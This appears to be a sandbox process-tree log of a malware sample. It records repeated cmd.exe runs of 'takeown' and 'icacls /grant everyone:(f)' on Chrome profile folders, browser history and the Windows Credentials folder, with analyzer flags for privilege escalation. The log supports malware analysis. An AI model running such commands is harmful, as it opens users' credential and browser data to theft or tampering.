C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList643⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History && icacls C:\Users\Admin\AppData\Local\History /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History\History.IE5 && icacls C:\Users\Admin\AppData\Local\History\History.IE5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History\History.IE53⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History\History.IE5 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History\History.IE5\MSHist012024090320240904 && icacls C:\Users\Admin\AppData\Local\History\History.IE5\MSHist012024090320240904 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History\History.IE5\MSHist0120240903202409043⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History\History.IE5\MSHist012024090320240904 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History\Low && icacls C:\Users\Admin\AppData\Local\History\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft && icacls C:\Users\Admin\AppData\Local\Microsoft /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Credentials && icacls C:\Users\Admin\AppData\Local\Microsoft\Credentials /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Credentials3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Credentials /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Feeds /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~ /grant everyone:(f)2⤵
-
